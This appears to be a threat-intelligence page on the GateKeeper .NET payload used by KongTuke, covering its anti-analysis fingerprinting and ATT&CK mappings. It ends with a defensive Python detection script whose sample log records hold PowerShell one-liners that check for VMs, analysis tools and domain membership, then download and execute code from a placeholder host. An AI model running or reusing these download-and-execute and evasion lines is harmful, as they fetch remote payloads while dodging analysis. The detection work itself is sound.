Mallory · Malware · Used by 2 actors

GateKeeper

GateKeeper is a .NET payload associated with the financially motivated threat actor KongTuke, also tracked as Woodgnat. Public reporting describes it as an encrypted .NET payload with layered string encryption, extensive anti-analysis logic, and victim-fingerprinting functionality. In the observed KongTuke infection chain, GateKeeper appeared in the branch taken on hosts that are not domain-joined, after PowerShell-based staging and environment checks. Its Main() routine is described as building a fingerprint of the victim machine by running a gauntlet of anti-analysis checks; the broader chain also checked for analysis tools and virtualized environments and profiled the host to decide which payload to deliver. The reporting ties GateKeeper to KongTuke operations that used social-engineering lures such as CrashFix/ClickFix-style techniques together with selective payloading, with GateKeeper forming the more heavily obfuscated path intended to withhold follow-on payloads from sandboxes and other analysis environments. No standalone IOCs specific to GateKeeper were provided in the reporting.

THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers.
Woodgnat

GateKeeper: A .NET payload featuring layered encryption and extensive anti-analysis and victim-fingerprinting logic.

via Symantec blog (security.com)

KongTuke

KongTuke is known to use multiple other tools, such as ... the encrypted GateKeeper .NET payload...

via BleepingComputer (bleepingcomputer.com)
MITRE ATT&CK

Techniques & procedures

3 distinct techniques documented for this family, organized by ATT&CK tactic. T1497 and its sub-technique appear under both Defense Evasion and Discovery because ATT&CK assigns them to both tactics.

Execution

1 technique

T1059.001 PowerShell (evidence: 1)

In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command... Once a command is executed, a multi-stage PowerShell chain downloads and unpacks a portable WinPython environment and launches the ModeloRAT Python scripts.

Defense Evasion

2 techniques

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators.

T1497.001 System Checks (evidence: 1)

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators and distinguish domain-joined corporate machines from standalone WORKGROUP hosts so that the higher-value ModeloRAT payload is reserved for enterprise targets.

Discovery

2 techniques

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators.

T1497.001 System Checks (evidence: 1)

Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators and distinguish domain-joined corporate machines from standalone WORKGROUP hosts so that the higher-value ModeloRAT payload is reserved for enterprise targets.
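As an added hunting example (not code from Mallory, Symantec or BleepingComputer), the Python below triages PowerShell script-block text, the kind of content carried in Windows Event ID 4104 records, for the combination the evidence above describes: profiling of domain membership versus WORKGROUP, checks for virtual machines and analysis tools, and download-and-execute staging of a follow-on payload. The cmdlets and strings it matches are assumptions about how such checks are commonly written, not indicators from this page, and the sample records are constructed for the example.

```python
"""Score PowerShell script blocks for KongTuke-style host profiling.

Added example for this page. The page gives no KongTuke indicators, so the
patterns below are assumptions about how domain checks, VM/analysis-tool
checks and staging are commonly expressed in PowerShell. Sample records are
constructed, not captured from any real infection.
"""
import re
from dataclasses import dataclass, field

# Assumed indicators, grouped by the behaviour they evidence.
DOMAIN_PROFILING = [
    r"PartOfDomain",
    r"USERDOMAIN",
    r"\bWORKGROUP\b",
    r"Win32_ComputerSystem",
]
ANALYSIS_EVASION = [
    r"VMware|VirtualBox|VBox|QEMU|Hyper-V|KVM",
    r"procmon|wireshark|x64dbg|ollydbg|idaq|fiddler|procexp",
    r"Win32_BIOS|SerialNumber",
    r"Get-Process",
]
STAGING = [
    r"DownloadString|DownloadFile|Invoke-WebRequest|iwr\b|Net\.WebClient",
    r"Invoke-Expression|\biex\b",
    r"-EncodedCommand|-enc\b",
    r"python\.exe|WinPython",
]


@dataclass
class Verdict:
    score: int
    behaviours: list = field(default_factory=list)
    hits: dict = field(default_factory=dict)


def score_script_block(text: str) -> Verdict:
    """Return a Verdict for one script block.

    Each behaviour counts once however many of its patterns match, so a
    single noisy script never scores above 3. Domain profiling next to
    staging is the branch the reporting associates with GateKeeper.
    """
    hits = {}
    for name, patterns in (("domain_profiling", DOMAIN_PROFILING),
                           ("analysis_evasion", ANALYSIS_EVASION),
                           ("staging", STAGING)):
        matched = [p for p in patterns if re.search(p, text, re.IGNORECASE)]
        if matched:
            hits[name] = matched
    return Verdict(score=len(hits), behaviours=sorted(hits), hits=hits)


def triage(events, threshold: int = 2):
    """Score (record_id, script_text) pairs; keep those at or above threshold."""
    flagged = []
    for record_id, text in events:
        verdict = score_script_block(text)
        if verdict.score >= threshold:
            flagged.append((record_id, verdict))
    return flagged


# Constructed sample 4104 script-block texts (hypothetical, not KongTuke code).
SAMPLE_EVENTS = [
    ("4104-0001",
     "$cs = Get-WmiObject Win32_ComputerSystem; "
     "if (-not $cs.PartOfDomain -or $cs.Domain -eq 'WORKGROUP') "
     "{ $b = (New-Object Net.WebClient).DownloadString('http://example.invalid/gk'); iex $b }"),
    ("4104-0002",
     "if (Get-Process -Name procmon,wireshark,x64dbg -ErrorAction SilentlyContinue) { exit }; "
     "$bios = Get-WmiObject Win32_BIOS; if ($bios.SerialNumber -match 'VMware|VirtualBox') { exit }; "
     "if ($env:USERDOMAIN -eq $env:COMPUTERNAME) "
     "{ iex (iwr http://example.invalid/p -UseBasicParsing).Content }"),
    ("4104-0003",
     "Get-ChildItem C:\\Users\\admin\\Documents -Recurse | Measure-Object"),
    ("4104-0004",
     "Invoke-WebRequest -Uri https://updates.example.invalid/app.zip -OutFile app.zip"),
]

if __name__ == "__main__":
    for record_id, verdict in triage(SAMPLE_EVENTS):
        print(record_id, verdict.score, verdict.behaviours)
```

The threshold of 2 is deliberate: a lone download (record 4104-0004) is routine administration, and a lone VM check is common in installers, but a script that profiles domain membership or the analysis environment and then pulls a second stage matches the selective-payloading behaviour the reporting describes and is worth an analyst's attention.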
